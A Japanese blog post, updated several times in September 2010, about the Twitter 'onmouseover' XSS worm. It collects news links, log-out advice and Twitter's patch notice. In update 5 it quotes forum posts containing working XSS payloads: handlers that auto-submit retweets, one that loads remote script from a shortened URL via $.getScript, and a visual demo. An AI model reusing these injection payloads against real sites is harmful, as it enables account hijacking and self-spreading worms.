twitterのspamスクリプト踏んじゃった

↓ こんなの踏んじゃった。マウスを'status'のところにhoverさせると submitボタンを押すのかな?

最新ツイート: Matsta http://t.co/@"onmouseover="document.getElementById('status').value='RT Matsta';$('.status-update-form').submit();"class="modal-overlay"/ Retweeted by you 3分 ago

一回ログアウトしてログインしなおすとなおるようだ。twitter公式Webからログアウト出来ない人は、これ→ http://twitter.com/logout をクリックすべし。



詳しいことは続報を…コメント欄で誰かよろしく…。


■ 続報その1

Twitterの公式Webクライアント ( http://twitter.com/ からのログイン )に クロスサイトスクリプティングXSS)の問題があるようで、本人が意図しないツイートやRTが多発しています。

悪意を持った攻撃を受ける危険性があるので、ひとまず、Twitterの公式Webからは急ぎログオフすることをお勧めします。今のところ他のログインの方式を使ったアプリからの利用は問題無い模様です。


【緊急】Twitter公式Webから今すぐログオフを。XSSの問題(9/21 20時JST
http://blogs.itmedia.co.jp/sakamoto/2010/09/twitterwebxss92.html

しばらくTwitterの公式Webは使えないということかな?


■ 続報その2


今日Twitterに『RainbowTwtr』がこんにちは!!した経緯
http://togetter.com/li/52475


■ 続報その3


短縮URLJavaScriptのコード仕込めるから、短縮URLってアドレス確認せずに踏むの危険なんだな…。

恒例とまではいかないかも知れないがTwtterのXSS脆弱性を利用した悪質なコードが出回っているそうだ[register]。シンプルにURLに悪意のあるJavaScriptコードを付けるというだけだが(http://dev.twitter.com/search?query=%253C/script...)、スクリプトにはTwitterユーザのcookieが盗むコードが書かれている。カスペルスキーの研究者によれば、コードはURL短縮サービス(bit.ly)を利用して隠されており、既に10万以上の人がクリックしているとの事だ。NoScriptのようなものを使うか、短縮URLの本URLが分かるようなアドオン/拡張機能を入れておく事が望ましいだろう。


Twitter XSSが出ている
http://yebo-blog.blogspot.com/2010/09/twitter-xss.html

■ 続報その4


http://twitter.com/hapinano/status/25102437219


■ 続報その5

690 名前: 軍人(福岡県)[] 投稿日:2010/09/21(火) 22:33:32.96 id:nOM0Fv/E0 [4/4]
http://x.jp/#@"onmousemove="$('.wrapper').fadeTo('slow',0.5);"/

とりあえずこんな感じで jQueryが使えるからもうめちゃくちゃ

710 名前: ノンフィクション作家(関西地方)[sage] 投稿日:2010/09/21(火) 22:35:15.02 ID:+iHeElTJ0 [2/2]
晒しても大丈夫っぽいので
http://t.co/@"style="font-size:999999999999px;"onmouseover="$.getScript('http:\u002f\u002fis.gd\u002ffl9A7')"/

http://t.co/@"onmouseover="document.getElementById('status').value='RT test_nau';$('.status-update-form').submit();"style="background:red"/

http://t.co/@"onmouseover="document.getElementById('status').value='RT Unlevin ';$('.status-update-form').submit();"class="modal-overlay"/

俺が見つけたのはこの3つ

■ 続報その6

更新:パッチでの対応が完全に完了しました。[日本時間: 22:50]

http://status.twitter.jp/post/1161495941/xss

もうこの問題は修正されたようですね。


■ 続報その7


twitterの公式ブログのほうで詳しいアナウンスがありました。


「マウスオーバーの」問題についての全容
http://blog.twitter.jp/2010/09/blog-post_22.html

他のユーザーは、もう一歩改良してユーザーが認識しないうちに勝手に元のツイートをリツイートするコードを追加しました。

それって「改良」なのかな?「改造」か「変更」、もしくは(twitterの運営側から見れば)改悪のような気がするんだけど…。


コードを手直しすることをプログラマはよく「改良」とか「修正」とか言うけど、それっておかしくね?手直しによって、必ずくなるわけでもなければ、しくなるわけでもないので、くもしくもなっていない場合は、「改良」、「修正」ではなくて、「改造」とか「変更」と呼ぶべきじゃないかと思うのだけど、あんまりそういう言い方はしないよね…。なんでだろ…。